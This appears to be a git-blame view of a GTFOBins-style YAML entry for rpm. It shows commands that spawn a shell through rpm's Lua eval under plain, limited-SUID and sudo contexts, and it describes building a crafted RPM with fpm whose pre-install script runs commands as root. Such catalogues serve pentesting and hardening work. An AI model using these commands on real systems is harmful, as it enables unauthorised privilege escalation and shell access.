2018-05-21 21:14:41 +02:00
|
|
|
---
|
|
|
|
functions:
|
2018-10-05 19:55:38 +02:00
|
|
|
shell:
|
2019-02-14 12:29:22 +01:00
|
|
|
- code: rpm --eval '%{lua:os.execute("/bin/sh")}'
|
2021-01-10 18:25:55 +01:00
|
|
|
limited-suid:
|
|
|
|
- code: ./rpm --eval '%{lua:os.execute("/bin/sh")}'
|
2018-10-05 19:55:38 +02:00
|
|
|
sudo:
|
2019-02-14 12:29:22 +01:00
|
|
|
- code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
|
2019-02-02 16:54:57 +01:00
|
|
|
- description: |
|
|
|
|
It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.
|
|
|
|
```
|
|
|
|
TF=$(mktemp -d)
|
|
|
|
echo 'id' > $TF/x.sh
|
|
|
|
fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF
|
|
|
|
```
|
|
|
|
code: |
|
|
|
|
sudo rpm -ivh x-1.0-1.noarch.rpm
|
2018-05-25 01:10:39 +02:00
|
|
|
---
|